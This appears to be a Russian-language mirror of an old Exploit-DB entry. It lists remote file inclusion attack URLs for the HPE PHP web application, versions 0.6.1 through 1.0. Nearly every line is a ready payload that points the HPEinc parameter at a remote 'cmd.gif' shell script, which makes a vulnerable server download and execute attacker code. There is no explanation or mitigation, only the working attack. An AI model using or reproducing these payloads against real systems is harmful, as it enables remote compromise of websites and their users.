- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2240
- Проверка EDB
-
- Пройдено
- Автор
- THE MASTER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2006-08-22
Код:
########################################################################
# HPE v0.6.1 Remote File Inclusion Vulnerability
#
# Download: http://prdownloads.sourceforge.net/hpe/hpe-1.0.zip?download
# Download: http://prdownloads.sourceforge.net/hpe/HPE-0.7.0.tar.gz?download
# Download: http://prdownloads.sourceforge.net/hpe/HPE-0.6.5.tar.gz?download
# Download: http://prdownloads.sourceforge.net/hpe/HPE-0.6.1.tar.gz?download
#
# Found By: the master
#
########################################################################
1.0
# http://[Target]/[Path]/HPE/lang/de.php?HPEinc=http://cmd.gif?
# http://[Target]/[Path]/HPE/lang/fr.php?HPEinc=http://cmd.gif?
##############################################################################
0.7.0
# http://[Target]/[Path]/HPE/clickerr.php3?HPEinc=http://cmd.gif?
# http://[Target]/[Path]/HPE/loadcatnews.php3?HPEinc=http://cmd.gif?
# http://[Target]/[Path]/HPE/motd.php3?HPEinc=http://cmd.gif?
# http://[Target]/[Path]/HPE/plugins/mod.news.php3?HPEinc=http://cmd.gif?
# http://[Target]/[Path]/HPE/plugins/mod.newslog.php3?HPEinc=http://cmd.gif?
# http://[Target]/[Path]/HPE/plugins/news.htmlnews.php3?HPEinc=http://cmd.gif?
# http://[Target]/[Path]/HPE/plugins/news.xmlbi.php3?HPEinc=http://cmd.gif?
# http://[Target]/[Path]/HPE/plugins/news.xmlphp.php3?HPEinc=http://cmd.gif?
# http://[Target]/[Path]/HPE/plugins/news.xmlphp.php3?HPEinc=http://cmd.gif?
# http://[Target]/[Path]/HPE/plugins/page.dmoz.show.php3?HPEinc=http://cmd.gif?
# http://[Target]/[Path]/HPE/thememaker.php3?HPEinc=http://cmd.gif?
##############################################################################
0.6.5
# http://[Target]/[Path]/HPE/plugins/mod.news.php3?HPEinc=http://cmd.gif?
# http://[Target]/[Path]/HPE/plugins/news.htmlnews.php3?HPEinc=http://cmd.gif?
# http://[Target]/[Path]/HPE/plugins/news.xmlbi.php3?HPEinc=http://cmd.gif?
# http://[Target]/[Path]/HPE/plugins/news.xmlphp.php3?HPEinc=http://cmd.gif?
# http://[Target]/[Path]/HPE/plugins/page.dmoz.show.php3?HPEinc=http://cmd.gif?
# http://[Target]/[Path]/HPE/plugins/page.newnews.show.php3?HPEinc=http://cmd.gif?
# http://[Target]/[Path]/HPE/plugins/page.randnews.show.php3?HPEinc=http://cmd.gif?
# http://[Target]/[Path]/HPE/plugins/page.teaser.show.php3?HPEinc=http://cmd.gif?
###############################################################################
0.6.1
# http://[Target]/[Path]/HPE/plugins/mod.news.php3?HPEinc=http://cmd.gif?
# http://[Target]/[Path]/HPE/plugins/news.htmlnews.php3?HPEinc=http://cmd.gif?
# http://[Target]/[Path]/HPE/plugins/news.xmlbi.php3?HPEinc=http://cmd.gif?
# http://[Target]/[Path]/HPE/plugins/news.xmlphp.php3?HPEinc=http://cmd.gif?
# http://[Target]/[Path]/HPE/plugins/page.dmoz.show.php3?HPEinc=http://cmd.gif?
# http://[Target]/[Path]/HPE/thememaker.php3?HPEinc=http://cmd.gif?
###############################################################################
# milw0rm.com [2006-08-22]
- Источник
- www.exploit-db.com